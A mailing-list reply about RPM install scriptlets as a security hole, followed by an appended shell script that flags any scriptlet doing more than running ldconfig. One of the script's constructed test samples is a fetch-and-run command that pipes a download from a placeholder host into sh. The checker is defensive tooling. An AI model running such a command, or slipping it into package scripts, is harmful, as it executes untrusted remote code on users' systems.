Re: Viruses
Alan Shutko <ats@acm.org> writes:

> There's the rub.  RPM pre and post install/uninstall scripts can do
> anything they want.  It's not obvious to me how one would look at
> those scripts when getting a package, though I assume you could
> rpm2cpio it and look.  But not many people are going to do that, so
> it's a vulnerability.

How necessary a vulnerability is it?  How many sorts of
install/uninstall scripts are there?  (i.e., how feasible would a
"safe" rpm be---one that could just run ldconfig if asked, say?)

I guess I'm thinking of something similar to the (probably obsolete
nowadays) problem of shell archives (shar).  Once upon a time, it was
quite usual to get source encoded as a shell script (think large
"here" documents, and sed, and things), which you could run to extract
the source.  This was something of a security hole, and there was an
unshar program, which could understand enough of the shell script used
when constructing shell archives to extract the source, but which
wouldn't do nasty things.
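A rough sketch of the "unshar for RPM" idea, added here as an example rather than anything from this thread or from the rpm project: query the scriptlets with `rpm -qp --scripts` (a real rpm option; the header format it prints is assumed from memory) and accept the package only if every scriptlet is empty or is nothing but an ldconfig call. The three sample scriptlets below are constructed for the example, including the malicious-looking curl line.

```shell
#!/bin/sh
# Added example (not from the thread): triage RPM scriptlets before installing.
# Policy: a package is "safe" only if its pre/post scriptlets do nothing
# except run ldconfig, which is the one thing most library packages need.

# Return 0 if the scriptlet text (as printed by `rpm -qp --scripts`) contains
# nothing but ldconfig calls, comments and blank lines; 1 otherwise.
scriptlet_is_safe() {
    # Assumed rpm output format: "postinstall scriptlet (using /bin/sh):"
    # followed by the script body, or "postinstall program: /sbin/ldconfig"
    # when the spec used `%post -p /sbin/ldconfig`.
    leftover=$(printf '%s\n' "$1" \
        | grep -v -E '^(pre|post)(install|uninstall|trans) scriptlet \(using [^)]*\):$' \
        | grep -v -E '^(pre|post)(install|uninstall|trans) program: (/usr)?/sbin/ldconfig$' \
        | grep -v -E '^[[:space:]]*(#.*)?$' \
        | grep -v -E '^[[:space:]]*((/usr)?/sbin/)?ldconfig([[:space:]]+-[A-Za-z]+)*[[:space:]]*$' \
        || true)
    # Anything left over is a command we did not whitelist: hand it to a human.
    [ -z "$leftover" ]
}

# Wrapper around the real rpm query (needs the rpm tool; not exercised below).
inspect_rpm() {
    scripts=$(rpm -qp --scripts "$1") || return 2
    if scriptlet_is_safe "$scripts"; then
        echo "$1: scriptlets are empty or ldconfig only"
    else
        echo "$1: scriptlets need manual review:"
        printf '%s\n' "$scripts"
    fi
}

# Constructed sample scriptlets, in the format rpm prints.
SAFE_PROGRAM_SCRIPTS='postinstall program: /sbin/ldconfig
postuninstall program: /sbin/ldconfig'

SAFE_SHELL_SCRIPTS='postinstall scriptlet (using /bin/sh):
# refresh the dynamic linker cache
/sbin/ldconfig
postuninstall scriptlet (using /bin/sh):
/sbin/ldconfig'

UNSAFE_SCRIPTS='preinstall scriptlet (using /bin/sh):
/sbin/ldconfig
curl -s http://example.invalid/x | sh'

for name in SAFE_PROGRAM_SCRIPTS SAFE_SHELL_SCRIPTS UNSAFE_SCRIPTS; do
    eval "body=\$$name"
    if scriptlet_is_safe "$body"; then
        echo "$name: safe"
    else
        echo "$name: needs review"
    fi
done
```

The whitelist is deliberately strict: `ldconfig -n /some/dir` is rejected along with everything else, because once arguments with paths are allowed the check stops being a check. Triggers (`%triggerin` and friends) are not covered by `--scripts` output here and would need the same treatment with `rpm -qp --triggers`.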